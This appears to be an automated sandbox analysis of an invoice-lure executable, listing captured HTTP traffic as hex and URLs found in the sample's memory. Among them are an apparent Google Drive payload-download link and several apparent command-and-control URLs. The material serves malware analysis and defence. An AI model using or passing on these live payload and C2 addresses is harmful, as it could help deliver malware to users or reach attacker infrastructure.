03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:15 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: ROUTE.EXE, 00000004.00000002.30463409490.000000000448C000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000003EDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIs
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
    Source: FACTURA A-7507_H1758.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000003E44000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000003894000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.26992521288.0000000035594000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.caprinaday.net:80/pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS
    Source: ROUTE.EXE, 00000004.00000002.30463409490.000000000511C000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004B6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gokulmohan.online/rfuo/?Hh=g6BlO&amp;2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj6
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691759310.0000000001466000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrl-llc.net
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691759310.0000000001466000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrl-llc.net/n7zc/
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.svg
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722213547.00000000347C0000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F31000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612814198.0000000004F2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download5
    Source: E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002EDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
    Source: ROUTE.EXE, 00000004.00000003.26880300148.0000000007C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lichnyyrost.online&rand=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-websi
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.00000000052AE000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004CFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.3bbfibre3app.net/xb3p/?2rul-=
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30463409490.000000000461E000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30463409490.000000000461E000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
